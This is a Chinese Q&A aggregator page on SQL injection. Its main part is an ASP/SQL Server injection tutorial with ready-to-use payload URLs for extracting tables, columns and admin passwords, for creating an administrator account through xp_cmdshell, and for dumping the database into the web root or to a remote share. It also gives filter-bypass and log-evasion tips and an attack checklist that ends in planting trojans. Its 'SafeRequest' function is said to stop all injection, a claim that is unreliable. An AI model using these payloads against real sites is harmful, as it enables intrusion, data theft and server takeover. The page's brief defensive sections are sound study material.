這裡蒐索程式師資訊,查找有用的技術資料
當前位置:首頁 » 編程語言 » sql注入攻防入門詳解
擴展閱讀
webinf下怎麼引入js 2023-08-31 21:54:13
堡壘機怎麼打開web 2023-08-31 21:54:11

sql注入攻防入門詳解

發布時間: 2022-04-17 17:09:27

① 什麼事sql注入攻擊我需要的是詳解,在百度上面找的都是不全面的,希望高手給我個回答。謝謝了。

就是網站的任何切入點(能輸入代碼的地方),比如文本框,URL地址之類的地方
在這裡面輸入一些試探性或破壞性的sql語句,如果系統沒有做好防護措施,
那麼這些本不該執行的外來的sql語句將會被執行,別人會可以藉此猜測你系統中
資料庫的構造或者內容,甚至刪除其中數據,造成不可估量的後果

② 什麼是sql 注入,如何實現注入

找了一個,希望能幫助你
隨著B/S模式應用開發的發展,使用這種模式編寫應用程序的程序員也越來越多。但是由於這個行業的入門門檻不高,程序員的水平及經驗也參差不齊,相當大一部分程序員在編寫代碼的時候,沒有對用戶輸入數據的合法性進行判斷,使應用程序存在安全隱患。用戶可以提交一段資料庫查詢代碼,根據程序返回的結果,獲得某些他想得知的數據,這就是所謂的SQL Injection,即SQL注入。

SQL注入是從正常的WWW埠訪問,而且表面看起來跟一般的Web頁面訪問沒什麼區別,所以目前市面的防火牆都不會對SQL注入發出警報

,如果管理員沒查看IIS日誌的習慣,可能被入侵很長時間都不會發覺。

但是,SQL注入的手法相當靈活,在注入的時候會碰到很多意外的情況。能不能根據具體情況進行分析,構造巧妙的SQL語句,從而成功獲取想要的數據,是高手與「菜鳥」的根本區別。

根據國情,國內的網站用ASP+Access或SQLServer的佔70%以上,PHP+MySQ佔L20%,其他的不足10%。在本文,我們從分入門、進階至高級講解一下ASP注入的方法及技巧,PHP注入的文章由NB聯盟的另一位朋友zwell撰寫,希望對安全工作者和程序員都有用處。了解 ASP注入的朋友也請不要跳過入門篇,因為部分人對注入的基本判斷方法還存在誤區。大家准備好了嗎?Let's Go...

入門篇

如果你以前沒試過SQL注入的話,那麼第一步先把IE菜單=>工具=>Internet選項=>高級=>顯示友好 HTTP 錯誤信息前面的勾去掉。否則,不論伺服器返回什麼錯誤,IE都只顯示為HTTP 500伺服器錯誤,不能獲得更多的提示信息。

第一節、SQL注入原理

以下我們從一個網站www.mytest.com開始(註:本文發表前已徵得該站站長同意,大部分都是真實數據)。

在網站首頁上,有名為「IE不能打開新窗口的多種解決方法」的鏈接,地址為:http://www.mytest.com/showdetail.asp?id=49,我們在這個地址後面加上單引號』,伺服器會返回下面的錯誤提示:

Microsoft JET Database Engine 錯誤 '80040e14'

字元串的語法錯誤 在查詢表達式 'ID=49'' 中。

/showdetail.asp,行8

從這個錯誤提示我們能看出下面幾點:

1. 網站使用的是Access資料庫,通過JET引擎連接資料庫,而不是通過ODBC。

2. 程序沒有判斷客戶端提交的數據是否符合程序要求。

3. 該SQL語句所查詢的表中有一名為ID的欄位。

從上面的例子我們可以知道,SQL注入的原理,就是從客戶端提交特殊的代碼,從而收集程序及伺服器的信息,從而獲取你想到得到的資料。

第二節、判斷能否進行SQL注入

看完第一節,有一些人會覺得:我也是經常這樣測試能否注入的,這不是很簡單嗎?

其實,這並不是最好的方法,為什麼呢?

首先,不一定每台伺服器的IIS都返回具體錯誤提示給客戶端,如果程序中加了cint(參數)之類語句的話,SQL注入是不會成功的,但伺服器同樣會報錯,具體提示信息為處理 URL 時伺服器上出錯。請和系統管理員聯絡。

其次,部分對SQL注入有一點了解的程序員,認為只

要把單引號過濾掉就安全了,這種情況不為少數,如果你用單引號測試,是測不到注入點的

那麼,什麼樣的測試方法才是比較准確呢?答案如下:

① http://www.mytest.com/showdetail.asp?id=49

② http://www.mytest.com/showdetail.asp?id=49 ;and 1=1

③ http://www.mytest.com/showdetail.asp?id=49 ;and 1=2

這就是經典的1=1、1=2測試法了,怎麼判斷呢?看看上面三個網址返回的結果就知道了:

可以注入的表現:

① 正常顯示(這是必然的,不然就是程序有錯誤了)

② 正常顯示,內容基本與①相同

③ 提示BOF或EOF(程序沒做任何判斷時)、或提示找不到記錄(判斷了rs.eof時)、或顯示內容為空(程序加了on error resume next)

不可以注入就比較容易判斷了,①同樣正常顯示,②和③一般都會有程序定義的錯誤提示,或提示類型轉換時出錯。

當然,這只是傳入參數是數字型的時候用的判斷方法,實際應用的時候會有字元型和搜索型參數,我將在中級篇的「SQL注入一般步驟」再做分析。

第三節、判斷資料庫類型及注入方法

不同的資料庫的函數、注入方法都是有差異的,所以在注入之前,我們還要判斷一下資料庫的類型。一般ASP最常搭配的資料庫是Access和SQLServer,網上超過99%的網站都是其中之一。

怎麼讓程序告訴你它使用的什麼資料庫呢?來看看:

SQLServer有一些系統變數,如果伺服器IIS提示沒關閉,並且SQLServer返回錯誤提示的話,那可以直接從出錯信息獲取,方法如下:

http://www.mytest.com/showdetail.asp?id=49 ;and user>0

這句語句很簡單,但卻包含了SQLServer特有注入方法的精髓,我自己也是在一次無意的測試中發現這種效率極高的猜解方法。讓我看來看看它的含義:首先,前面的語句是正常的,重點在and user>0,我們知道,user是SQLServer的一個內置變數,它的值是當前連接的用戶名,類型為nvarchar。拿一個 nvarchar的值跟int的數0比較,系統會先試圖將nvarchar的值轉成int型,當然,轉的過程中肯定會出錯,SQLServer的出錯提示是:將nvarch

ar值 」abc」 轉換數據類型為 int 的列時發生語法錯誤,呵呵,abc正是變數user的值,這樣,不廢吹灰之力就拿到了資料庫的用戶名。在以後的篇幅里,大家會看到很多用這種方法的語句。

順便說幾句,眾所周知,SQLServer的用戶sa是個等同Adminstrators許可權的角色,拿到了sa許可權,幾乎肯定可以拿到主機的 Administrator了。上面的方法可以很方便的測試出是否是用sa登錄,要注意的是:如果是sa登錄,提示是將」dbo」轉換成int的列發生錯誤,而不是」sa」。

如果伺服器IIS不允許返回錯誤提示,那怎麼判斷資料庫類型呢?我們可以從Access和SQLServer和區別入手,Access和 SQLServer都有自己的系統表,比如存放資料庫中所有對象的表,Access是在系統表[msysobjects]中,但在Web環境下讀該表會提示「沒有許可權」,SQLServer是在表[sysobjects]中,在Web環境下可正常讀取。

在確認可以注入的情況下,使用下面的語句:

http://www.mytest.com/showdetail.asp?id=49 ;and (select count(*) from sysobjects)>0

http://www.mytest.com/showdetail.asp?id=49 ;and (select count(*) from msysobjects)>0

如果資料庫是SQLServer,那麼第一個網址的頁面與原頁面http://www.mytest.com/showdetail.asp?id= 49是大致相同的;而第二個網址,由於找不到表msysobjects,會提示出錯,就算程序有容錯處理,頁面也與原頁面完全不同。

如果資料庫用的是Access,那麼情況就有所不同,第一個網址的頁面與原頁面完全不同;第二個網址,則視乎資料庫設置是否允許讀該系統表,一般來說是不允許的,所以與原網址也是完全不同。大多數情況下,用第一個網址就可以得知系統所用的資料庫類型,第二個網址只作為開啟IIS錯誤提示時的驗證。

進階篇

在入門篇,我們學會了SQL注入的判斷方法,但真正要拿到網站的保密內容,是遠遠不夠的。接下來,我們就繼續學習如何從資料庫中獲取想要獲得的內容,首先,我們先看看SQL注入的一般步驟:

第一節、SQL注入的一般步驟

首先,判斷環境,尋找注入點,判斷資料庫類型,這在入門篇已經講過了。

其次,根據注入參數類型,在腦海中重構SQL語句的原貌,按參數類型主要分為下面三種:

(A) ID=49 這類注入的參

數是數字型,SQL語句原貌大致如下:

Select * from 表名 where 欄位=49

注入的參數為ID=49 And [查詢條件],即是生成語句:

Select * from 表名 where 欄位=49 And [查詢條件]

(B) Class=連續劇 這類注入的參數是字元型,SQL語句原貌大致概如下:

Select * from 表名 where 欄位=』連續劇』

注入的參數為Class=連續劇』 and [查詢條件] and 『』=』 ,即是生成語句:

Select * from 表名 where 欄位=』連續劇』 and [查詢條件] and 『』=』』

&; 搜索時沒過濾參數的,如keyword=關鍵字,SQL語句原貌大致如下:

Select * from 表名 where 欄位like 』%關鍵字%』

注入的參數為keyword=』 and [查詢條件] and 『%25』=』, 即是生成語句:

Select * from 表名 where欄位like 』%』 and [查詢條件] and 『%』=』%』

接著,將查詢條件替換成SQL語句,猜解表名,例如:

ID=49 And (Select Count(*) from Admin)>=0

如果頁面就與ID=49的相同,說明附加條件成立,即表Admin存在,反之,即不存在(請牢記這種方法)。如此循環,直至猜到表名為止。

表名猜出來後,將Count(*)替換成Count(欄位名),用同樣的原理猜解欄位名。

有人會說:這里有一些偶然的成分,如果表名起得很復雜沒規律的,那根本就沒得玩下去了。說得很對,這世界根本就不存在100%成功的黑客技術,蒼蠅不叮無縫的蛋,無論多技術多高深的黑客,都是因為別人的程序寫得不嚴密或使用者保密意識不夠,才有得下手。

有點跑題了,話說回來,對於SQLServer的庫,還是有辦法讓程序告訴我們表名及欄位名的,我們在高級篇中會做介紹。

最後,在表名和列名猜解成功後,再使用SQL語句,得出欄位的值,下面介紹一種最常用的方法-Ascii逐字解碼法,雖然這種方法速度很慢,但肯定是可行的方法。

我們舉個例子,已知表Admin中存在username欄位,首先,我們取第一條記錄,測試長度:

http://www.mytest.com/showdetail.asp?id=49 ;and (select top 1 len(username) from Admin)>0

先說明原理:如果top 1的username長度大於0,則條件成立;接著就是>1、>2、>3這樣測試下去,一直到條件不成立為止,比如>7成立,>8不成立,就是len(username)=8

當然沒人會笨得從0,1,2,3一個個測試,怎麼樣才比較快就看各自發揮了。在得到username的長度後,用mid(username,N,1)截取第N位字元,再asc(mid(username,N,1))得到ASCII碼,比如:

id=49 and (select top 1 asc(mid(username,1,1)) from Admin)>0

同樣也是用逐步縮小范圍的方法得到第1位字元的ASCII碼,注意的是英文和數字的ASCII碼在1-128之間,可以用折半法加速猜解,如果寫成程序測試,效率會有極大的提高。

第二節、SQL注入常用函數

有SQL語言基礎的人,在SQL注入的時候成功率比不熟悉的人高很多。我們有必要提高一下自己的SQL水平,特別是一些常用的函數及命令。

Access:asc(字元) SQLServer:unicode(字元)

作用:返回某字元的ASCII碼

Access:chr(數字) SQLServer:nchar(數字)

作用:與asc相反,根據ASCII碼返回字元

Access:mid(字元串,N,L) SQLServer:substring(字元串,N,L)

作用:返回字元串從N個字元起長度為L的子字元串,即N到N+L之間的字元串

Access:abc(數字) SQLServer:abc (數字)

作用:返回數字的絕對值(在猜解漢字的時候會用到)

Access:A between B And C SQLServer:A between B And C

作用:

判斷A是否界於B與C之間

第三節、中文處理方法

在注入中碰到中文字元是常有的事,有些人一碰到中文字元就想打退堂鼓了。其實只要對中文的編碼有所了解,「中文恐懼症」很快可以克服。

先說一點常識:

Access中,中文的ASCII碼可能會出現負數,取出該負數後用abs()取絕對值,漢字字元不變。

SQL Server中,中文的ASCII為正數,但由於是UNICODE的雙位編碼,不能用函數ascii()取得ASCII碼,必須用函數unicode ()返回unicode值,再用nchar函數取得對應的中文字元。

了解了上面的兩點後,是不是覺得中文猜解其實也跟英文差不多呢?除了使用的函數要注意、猜解范圍大一點外,方法是沒什麼兩樣的。

高級篇

看完入門篇和進階篇後,稍加練習,破解一般的網站是沒問題了。但如果碰到表名列名猜不到,或程序作者過濾了一些特殊字元,怎麼提高注入的成功率?怎麼樣提高猜解效率?請大家接著往下看高級篇。

第一節、利用系統表注入SQLServer資料庫

SQL Server是一個功能強大的資料庫系統,與操作系統也有緊密的聯系,這給開發者帶來了很大的方便,但另一方面,也為注入者提供了一個跳板,我們先來看看幾個具體的例子



① http://Site/url.asp?id=1;exec master..xp_cmdshell 「net user name password /add」--

分號;在SQLServer中表示隔開前後兩句語句,--表示後面的語句為注釋,所以,這句語句在SQLServer中將被分成兩句執行,先是Select出ID=1的記錄,然後執行存儲過程xp_cmdshell,這個存儲過程用於調用系統命令,於是,用net命令新建了用戶名為name、密碼為password的windows的帳號,接著:

② http://Site/url.asp?id=1;exec master..xp_cmdshell 「net localgroup name administrators /add」--

將新建的帳號name加入管理員組,不用兩分鍾,你已經拿到了系統最高許可權!當然,這種方法只適用於用sa連接資料庫的情況,否則,是沒有許可權調用xp_cmdshell的。

③ http://Site/url.asp?id=1 ;and db_name()>0

前面有個類似的例子and user>0,作用是獲取連接用戶名,db_name()是另一個系統變數,返回的是連接的資料庫名。

④ http://Site/url.asp?id=1;backup database 資料庫名 to disk=』c:\inetpub\wwwroot\1.db』;--

這是相當狠的一招,從③拿到的資料庫名,加上某些IIS出錯暴露出的絕對路徑,將資料庫備份到Web目錄下面,再用HTTP把整個資料庫就完完整整的下載回來,所有的管理員及用戶密碼都一覽無遺!在不知道絕對路徑的時候,還可以備份到網路地址的方法(如\202.96.xx.xx\Share \1.db),但成功率不高。

⑤ http://Site/url.asp?id=1 ;and (Select Top 1 name from sysobjects where xtype=』U』 and status>0)>0

前面說過,sysobjects是SQLServer的系統表,存儲著所有的表名、視圖、約束及其它對象,xtype=』U』 and status>0,表示用戶建立的表名,上面的語句將第一個表名取出,與0比較大小,讓報錯信息把表名暴露出來。第二、第三個表名怎麼獲取?還是留給我們聰明的讀者思考吧。

⑥ http://Site/url.asp?id=1 ;and (Select Top 1 col_name(object_id(『表名』),1) from sysobjects)>0

從⑤拿到表名後,用object_id(『表名』)獲取表名對應的內部ID,col_name(表名ID,1)代表該表的第1個欄位名,將1換成2,3,4...就可以逐個獲取所猜解表裡面的欄位名。

以上6點是我研究SQLServer注入半年多以來的心血結晶,可以看出,對SQLServer的了解程度,直接影響著成功率及猜解速度。在我研究SQLServer注入之後,我在開發方面的水平也得到很大的提高,呵呵,也許安全與開發本來就是相輔相成的吧。

第二節、繞過程序限制繼續注入

在入門篇提到,有很多人喜歡用』號測試注入漏洞,所以也有很多人用過濾』號的方法來「防止」注入漏洞,這也許能擋住一些入門者的攻擊,但對SQL注入比較熟悉的人,還是可以利用相關的函數,達到繞過程序限制的目的。

在「SQL注入的一般步驟」一節中,我所用的語句,都是經過我優化,讓其不包含有單引號的;在「利用系統表注入SQLServer資料庫」中,有些語句包含有』號,我們舉個例子來看

看怎麼改造這些語句:

簡單的如where xtype=』U』,字元U對應的ASCII碼是85,所以可以用where xtype=char(85)代替;如果字元是中文的,比如where name=』用戶』,可以用where name=nchar(29992)+nchar(25143)代替。

第三節、經驗小結

1.有些人會過濾Select、Update、Delete這些關鍵字,但偏偏忘記區分大小寫,所以大家可以用selecT這樣嘗試一下。

2.在猜不到欄位名時,不妨看看網站上的登錄表單,一般為了方便起見,欄位名都與表單的輸入框取相同的名字。

3.特別注意:地址欄的+號傳入程序後解釋為空格,%2B解釋為+號,%25解釋為%號,具體可以參考URLEncode的相關介紹。

4.用Get方法注入時,IIS會記錄你所有的提交字元串,對Post方法做則不記錄,所以能用Post的網址盡量不用Get。

5. 猜解Access時只能用Ascii逐字解碼法,SQLServer也可以用這種方法,只需要兩者之間的區別即可,但是如果能用SQLServer的報錯信息把值暴露出來,那效率和准確率會有極大的提高。

防範方法

SQL注入漏洞可謂是「千里之堤,潰於蟻穴」,這種漏洞在網上極為普遍,通常是由於程序員對注入不了解,或者程序過濾不嚴格,或者某個參數忘記檢查導致。在這里,我給大家一個函數,代替ASP中的Request函數,可以對一切的SQL注入Say NO,函數如下:

Function SafeRequest(ParaName,ParaType)
'--- 傳入參數 ---
'ParaName:參數名稱-字元型
'ParaType:參數類型-數字型(1表示以上參數是數字,0表示以上參數為字元)

Dim ParaValue
ParaValue=Request(ParaName)
If ParaType=1 then
If not isNumeric(ParaValue) then
Response.write "參數" & ParaName & "必須為數字型!"
Response.end
End if
Else
ParaValue=replace(ParaValue,"'","''")
End if
SafeRequest=ParaValue
End function

③ 求教誰給講講SQL注入攻擊的步驟

第一步:SQL注入點探測。探測SQL注入點是關鍵的第一步,通過適當的分析應用程序,可以判斷什麼地方存在SQL注入點。通常只要帶有輸入提交的動態網頁,並且動態網頁訪問資料庫,就可能存在SQL注入漏洞。如果程序員信息安全意識不強,採用動態構造SQL語句訪問資料庫,並且對用戶輸入未進行有效驗證,則存在SQL注入漏洞的可能性很大。一般通過頁面的報錯信息來確定是否存在SQL注入漏洞。
第二步:收集後台資料庫信息。不同資料庫的注入方法、函數都不盡相同,因此在注入之前,我們先要判斷一下資料庫的類型。判斷資料庫類型的方法有很多,可以輸入特殊字元,如單引號,讓程序返回錯誤信息,我們根據錯誤信息提示進行判斷,還可以使用特定函數來判斷。
第三步:猜解用戶名和密碼。資料庫中的表和欄位命名一般都是有規律的,通過構造特殊的SQL語句在資料庫中依次猜解出表名、欄位名、欄位數、用戶名和密碼。
第四步:查找Web後台管理入口。Web後台管理通常不對普通用戶開放,要找到後台管理的登錄網址,可以利用Web目錄掃描工具快速搜索到可能的登錄地址,然後逐一嘗試,便可以找到後台管理平台的登錄網址。
第五步:入侵和破壞。一般後台管理具有較高許可權和較多的功能,使用前面已破譯的用戶名、密碼成功登錄後台管理平台後,就可以任意進行破壞,比如上傳木馬、篡改網頁、修改和竊取信息等,還可以進一步提權,入侵Web伺服器和資料庫伺服器。

④ sql注入攻擊與防禦是什麼

SQL注入攻擊:

惡意用戶在提交查詢請求的過程中將SQL語句插入到請求內容中,同時程序本身對用戶輸入內容過分信任而未對惡意用戶插入的SQL語句進行過濾,導致SQL語句直接被服務端執行。

SQL注入攻擊分類:

①注入點的不同分類:數字類型的注入、字元串類型的注入。

②提交方式的不同分類:GET注入、POST注入、COOKIE注入、HTTP注入。

③獲取信息方式的不同分類:基於布爾的盲注、基於時間的盲注、基於報錯的盲注。

SQL注入攻擊防禦方法:

①定製黑名單:將常用的SQL注入字元寫入到黑名單中,然後通過程序對用戶提交的POST、GET請求以及請求中的各個欄位都進行過濾檢查,篩選威脅字元。

②限制查詢長度:由於SQL注入過程中需要構造較長的SQL語句,因此,一些特定的程序可以使用限制用戶提交的請求內容的長度來達到防禦SQL注入的目的,但這種效果不太好。

③限制查詢類型:限制用戶請求內容中每個欄位的類型,並在用戶提交請求的時候進行檢查,凡不符合該類型的提交方式就認為是非法請求。

④白名單法:該方法只對部分程序有效,對一些請求內容相對固定的程序,可以制定請求內容的白名單,比如:某程序接受的請求只有數字,且數字為1-100,這樣可以檢查程序接受的請求內容是否匹配,如果不匹配,則認為是非法請求。

⑤設置資料庫許可權:根據程序要求為特定的表設置特定的許可權,如:某段程序對某表只需具備select許可權即可,這樣即使程序存在問題,惡意用戶也無法對表進行update或insert等寫入操作。

⑥限制目錄許可權:Web目錄應至少遵循可寫目錄不可執行,可執行目錄不可寫的原則;在此基礎上,對各目錄進行必要的許可權細化。

⑤ SQL注入攻擊的種類和防範手段有哪些

所謂SQL注入式攻擊,就是攻擊者把SQL命令插入到Web表單的輸入域或頁面請求的查詢字元串,欺騙伺服器執行惡意的SQL命令。

在某些表單中,用戶輸入的內容直接用來構造(或者影響)動態SQL命令,或作為存儲過程的輸入參數,這類表單特別容易受到SQL注入式攻擊。常見的SQL注入式攻擊過程類如:


⑴ 某個ASP.NET Web應用有一個登錄頁面,這個登錄頁面控制著用戶是否有權訪問應用,它要求用戶輸入一個名稱和密碼。


⑵ 登錄頁面中輸入的內容將直接用來構造動態的SQL命令,或者直接用作存儲過程的參數。

⑥ 黑客攻防實戰編程的前 言

《黑客攻防實戰入門》、《黑客攻防實戰詳解》和《黑客攻防實戰進階》這3本書自面世以來,得到了廣大讀者的肯定與好評。其銷量一直排在同類書籍的前列,筆者在此深表感謝。與此同時,應廣大讀者的要求,筆者針對當前黑客編程領域的熱點及難點問題,撰寫了這本《黑客攻防實戰編程》一書。本書一如既往地保持著前3本書的「授之以魚,不如授之以漁」的風格,向讀者介紹黑客入侵及防禦相關編程技術的思考方法和思維方式,而不是單單介紹編程語法。本書是筆者通過多年的研究與實踐,在把握國內外安全領域研究的熱點及難點的基礎之上,進行歸納總結所完成的一本黑客編程入門及提高書籍,這一點是本書區別於其他同類書籍的根本之處。
關於黑客
長期以來,由於諸多方面的因素,「黑客」這個字眼變得十分敏感。不同的人群對黑客也存在不同的理解,甚至沒有人願意承認自己是黑客。有些人認為,黑客是一群狂熱的技術愛好者,他們無限度地追求技術的完美;有些人認為,黑客只是一群擁有技術,但思想簡單的毛頭小夥子;還有些人認為黑客是不應該存在的,他們是網路的破壞者。這里,我們沒有必要對這個問題爭論不休,也無須為黑客加上一個標準的定義,但從客觀存在的事實來看,黑客這類群體往往存在以下共同點。
(1)強烈的技術渴望與完美主義:驅動他們成長的是對技術的無限渴望,獲得技術的提高才是他們最終的任務。
(2)強烈的責任感:只有強烈的責任感才能使他們不會走向歧途,責任感告訴他們不要在任何媒體上公布成功入侵的伺服器;不要對其入侵的伺服器進行任何破壞;在發現系統漏洞後要立即通知官方對該漏洞採取必要的修補措施。在官方補丁沒有公布之前,絕對不要大范圍地公開漏洞利用代碼。一方面,黑客入侵可能造成網路的暫時癱瘓;另一方面,黑客也是整個網路的建設者,他們不知疲倦地尋找網路大廈的缺陷,使得網路大廈的根基更加穩固。
為什麼寫作本書
不容樂觀的事實是,一部分人歪曲了黑客的本質,被不良動機所驅使而進行入侵活動,威脅網路的健康發展。對於我國來說,形勢尤為嚴峻。我國信息化建設遲於美國等發達國家,信息安全技術水平也相對落後。在幾次黑客大戰中,國內網站的弱口令及漏洞比比皆是。這種現狀實在令人擔憂,值得深思和反省,從中也可以看出傳統的計算機網路教學層次是遠遠不夠的。可能出於安全等其他角度的考慮,傳統教學往往只注重表面上的應用,而避開一些敏感的技術。設想一下,如果一個網站的管理員只學會架構網站,卻不關心如何入侵自己的網站,那麼如何對自己網站的缺陷了如指掌?如何能夠及時地獲知最新漏洞的描述而提前做好抵禦?如果以上都做不到,那就更不要談日常的系統更新、維護和打補丁了。然而國內精通入侵的網管又有多少呢?長期以來,國內網管的潛意識里都認為「入侵」是個不光彩的勾當,甚至嗤之以鼻。隨著信息化程度越來越高,信息技術與生活的聯系越來越緊密,可以上網的電子設備逐年增加,電腦、PDA、手機,甚至家電。可以想像10年後,如果不了解入侵者的手段來採取必要的防禦措施,將要被入侵的設備不會僅僅限於電腦,也許還包括手機、家電和汽車等。因此在信息技術如此發達,溝通方式日益豐富和復雜的今天,我們不僅要學會如何正確使用網路,而且還需要學會如何防禦自己的網路被他人入侵,這也正是筆者寫作本書的初衷。
本書主要內容
作為《黑客攻防實戰入門》、《黑客攻防實戰詳解》和《黑客攻防實戰進階》的提高篇,本書以黑客「攻」、「防」的視角,針對目前國內外安全研究的熱點和難點問題進行研究,涵蓋了Web入侵腳本、病毒、木馬、網馬、加密解密、Shellcode、漏洞溢出滲透,以及漏洞挖掘等相關領域的程序開發研究。
本書分為內容獨立的7章,讀者可以根據實際需求有選擇跳躍式閱讀,各章的主要內容如下。
第1章「Web入侵腳本編程」從伺服器搭建開始,介紹目前網路上最為猖獗的「SQL注入」和「跨站腳本攻擊」入侵手段、原理與編程技術,以及防護手段。
第2章「病毒原理及代碼解析」在總結計算機病毒發展歷史、病毒種類及病毒命名方式之後,詳細地介紹計算機病毒原理,並對病毒源代碼進行了全面的剖析。
第3章「木馬網馬程序分析」針對木馬及網馬的源代碼進行解析、總結了其工作原理、啟動方式、隱藏與防殺等相關技術。
第4章「軟體加密與解密」介紹序列號保護、軟體加密狗、時間限制及Key文件保護等目前常見軟體的加密方法,並分析注冊機等軟體的解密原理,以及跟蹤調試與反跟蹤調試技術。
第5章「shellcode原理與編寫」介紹了棧溢出、堆溢出等程序溢出原理,分析了PE文件結構,以及如何針對已知漏洞編寫Shellcode。
第6章「漏洞溢出程序分析與設計」詳細介紹了緩沖區溢出原理、類Unix、Windows及遠程Windows程序溢出方法等滲透方法,並介紹一款自動化滲透測試工具Metasploit及其使用方法。
第7章「漏洞挖掘與Fuzzing程序設計」介紹一種行之有效的自動化漏洞挖掘技術「Fuzzing」,進而介紹如何挖掘已知系統中所存在的漏洞。
另外,本書中所使用的源代碼及動畫教程等相關資源下載,
本書的姊妹書籍
本書的姊妹書籍有《黑客攻防實戰入門(第2版)》、《黑客攻防實戰詳解》和《黑客攻防實戰進階》3本,在本書推出之後,這4本書便形成了一個由淺入深完整的知識體系。幾乎涵蓋了黑客安全領域由入門到專家所必需掌握的所有的知識與技術,以供不同層次的讀者學習。
(1)《黑客攻防實戰入門》:踏入網路安全之門,初窺黑客攻防實戰技巧。
(2)《黑客攻防實戰詳解》:透析網路安全內幕,詳解黑客攻防體系。
(3)《黑客攻防實戰進階》:深入網路安全技術,進階黑客攻防專家。
(4)《黑客攻防實戰編程》:把握網路安全方向,實戰黑客攻防編程。
致謝
感謝張毅編輯在我還是學生時代時就接受了我的《黑客攻防實戰入門》樣稿,才使得這么多年我都有機會和信心將自己的經驗通過電子工業出版社分享給廣大讀者朋友。
感謝畢寧編輯長年來的指導與支持,並推薦給我大量的朋友與學習機會。才使得我能夠陸續撰寫《黑客攻防實戰入門(第2版)》、《黑客攻防實戰詳解》、《黑客攻防實戰進階》和《黑客攻防實戰編程》這4本書。
感謝孫學瑛老師和黃愛萍助理的指導,以及為本書的出版所付出辛勤勞動的所有朋友。
感謝qixu.liu在技術方面給與我的支持。
感謝長期以來支持我的讀者朋友和網友們。
需要聲明的是,本書的目的絕不是為那些懷有不良動機的人提供支持,也不承擔因為技術被濫用所產生的連帶責任。本書的目的在於最大限度地喚起大家的網路安全意識,正視我們的網路世界所面臨的一場危機並採取相應的行動。
鄧 吉

⑦ sql注入問題

通過程序代碼拼接的sql是動態構造的,由一個不變的基查詢字元串和一個用戶輸入字元串連接而成。例如一個攻擊者在前端文本框中輸入字元串「name' OR 'a'='a」,那麼構造的查詢就會變成:SELECT * FROM XXX WHERE _file = 'name' OR 'a'='a';
可以見得附加條件 OR 'a'='a' 會使 where 從句永遠評估為 true,因此該查詢在邏輯上將等同於一個更為簡化的查詢:SELECT * FROM items;
你說的1、2、3步驟總結到最後就是輸入上述的那種字元串

⑧ sql注入怎麼入門啊,先學什麼呢

每一項黑客技術的入門都必須要學好其對應的知識的入門基礎
比如asp注入你至少了解asp站的原理,最好懂一些代碼。

而且,我開始也是你這個態度,什麼都不想找,就在網上喊誰會啊,教我啊,不許收費的。。。結果是沒人來。。一個前輩指點我怎麼自學。

如果你想學,我告訴你怎麼自學,不教你任何專業知識,你自己想好。

⑨ 什麼是SQL注入攻擊

SQL 注入是注入式攻擊中的常見類型。 SQL 注入式攻擊是未將代碼與數據進行嚴格的隔離 ,導致在讀取用戶數據的時候 , 錯誤地把數據作為代碼的一部分執行 , 從而導致一些安全問題。

SQL 注入自誕生以來以其巨大的殺傷力聞名。典型的 SQL 注入的例子是當對 SQL 語旬進行字元串拼接操作時 , 直接使用未加轉義的用戶輸入內容作為變數 ,比如 :

實例

在上面的例子中 ,如果用戶輸入的 ID 只是一個數字是沒有問題的 , 可以執行正常的查詢語句。但如果直接用「;」隔開,在 testCondition 里插入其他 SQL 語旬,會帶來意想不到的結果,比如輸入 drop 、 delete 等。